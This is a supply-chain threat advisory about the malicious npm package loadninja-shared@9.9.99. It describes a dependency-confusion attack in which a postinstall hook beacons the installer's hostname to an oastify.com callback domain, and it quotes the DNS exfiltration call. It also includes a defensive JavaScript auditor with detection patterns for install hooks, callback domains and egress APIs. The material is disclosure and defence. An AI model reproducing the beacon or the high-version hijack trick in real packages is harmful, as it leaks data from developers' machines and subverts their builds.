Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in loadninja-shared (npm)

loadninja-shared

Risk score

92

AI summary

Indexed incident for loadninja-shared (npm).

Description

loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node beacon.js", which fires automatically on npm install. beacon.js reads os.hostname() and transmits it — together with a nonce and the package name — to the attacker-controlled out-of-band domain tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com (Burp Collaborator infrastructure) over both a DNS lookup (dns.lookup(NONCE + '.' + host63 + '.' + HOST,...)) and an HTTPS POST. The version 9.9.99 is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.

The OpenSSF Package Analysis project identified 'loadninja-shared' @ 9.9.99 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.
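A defender-side check for the indicators named above, added here as an example (it is not code from ThreatPkg, OSV or the OpenSSF Package Analysis project): it audits one resolved npm package for the three traits the description gives, an install-time lifecycle hook, a reference to an out-of-band callback domain paired with host-fingerprint and egress APIs, and a version that outranks the organisation's own internal package of the same name, then maps the findings to a block/review/allow verdict. The package.json and beacon.js fragment are constructed inline from the details on this page; `INTERNAL_PACKAGES` with its internal version 1.4.2, the callback-domain list, and every function name are this example's own assumptions.

```javascript
// Added example (not code from ThreatPkg, OSV or OpenSSF Package Analysis).
// Audits one resolved npm package for dependency-confusion traits.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"]; // npm runs these for every installed dependency

// Out-of-band callback services commonly used by beacons; a constructed starting list, extend as needed.
const OOB_DOMAIN_RE = /\b[a-z0-9-]+\.(?:oastify\.com|burpcollaborator\.net)\b/gi;

// Host fingerprint read plus network egress APIs; a lexical scan, not a data-flow analysis.
const EXFIL_API_RE = /\b(?:os\.hostname|dns\.lookup|dns\.resolve4?|https?\.request)\s*\(/g;

// Assumption: the organisation's private packages and the versions it actually publishes.
const INTERNAL_PACKAGES = { "loadninja-shared": "1.4.2" };

function parseVersion(v) {
  return String(v).replace(/^v/, "").split("-")[0].split(".").map((n) => parseInt(n, 10) || 0);
}

// Comparator-style result (1, 0, -1); tolerates differing component counts.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x > y ? 1 : -1;
  }
  return 0;
}

// pkg: parsed package.json; files: { path: contents } of the package's script files.
function auditPackage(pkg, files, internal = INTERNAL_PACKAGES) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ rule: "install-hook", detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [path, text] of Object.entries(files)) {
    const domains = [...new Set((text.match(OOB_DOMAIN_RE) || []).map((d) => d.toLowerCase()))];
    for (const d of domains) findings.push({ rule: "oob-callback-domain", detail: `${path} references ${d}` });
    const apis = [...new Set((text.match(EXFIL_API_RE) || []).map((s) => s.replace(/\s*\($/, "")))];
    const egress = apis.filter((a) => a !== "os.hostname");
    if (apis.includes("os.hostname") && egress.length > 0) {
      findings.push({ rule: "host-fingerprint-egress", detail: `${path} reads os.hostname() and calls ${egress.join(", ")}` });
    }
  }
  const known = internal[pkg.name];
  if (known !== undefined && compareVersions(pkg.version, known) > 0) {
    findings.push({ rule: "version-hijack", detail: `${pkg.name}@${pkg.version} outranks internal ${known}; npm would prefer the public copy` });
  }
  return findings;
}

// Policy: an install hook combined with any egress or hijack indicator is blocked outright.
function verdict(findings) {
  const rules = new Set(findings.map((f) => f.rule));
  const egressOrHijack = ["oob-callback-domain", "host-fingerprint-egress", "version-hijack"].some((r) => rules.has(r));
  if (rules.has("install-hook") && egressOrHijack) return "block";
  return rules.size > 0 ? "review" : "allow";
}

// Constructed sample input reproducing the details given on this page (not the real package contents).
const SAMPLE_PACKAGE_JSON = { name: "loadninja-shared", version: "9.9.99", scripts: { postinstall: "node beacon.js" } };
const SAMPLE_FILES = {
  "beacon.js": [
    "// benign PoC",
    "const os = require('os');",
    "const HOST = 'tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com';",
    "// constructed fragment: the real file resolves NONCE + '.' + host63 + '.' + HOST via dns.lookup(...)",
    "// after reading os.hostname(), then repeats the data in an https.request(...) POST",
  ].join("\n"),
};

const sampleFindings = auditPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES);
console.log(JSON.stringify({ verdict: verdict(sampleFindings), findings: sampleFindings }, null, 2));
```

Run it with `node audit.js` against a package's unpacked tarball contents; the sample input yields a `block` verdict with all four rules firing. In a pipeline the same check sits before `npm ci`, and the standing mitigations it complements are `ignore-scripts=true` in `.npmrc` (or `--ignore-scripts` on the command line) so lifecycle hooks never run unreviewed, and publishing internal packages under a scope pinned to the private registry so a public copy with a higher version cannot win resolution.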

Technical details

Affected versions

= 9.9.99

Indicators

  • affected version = 9.9.99 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
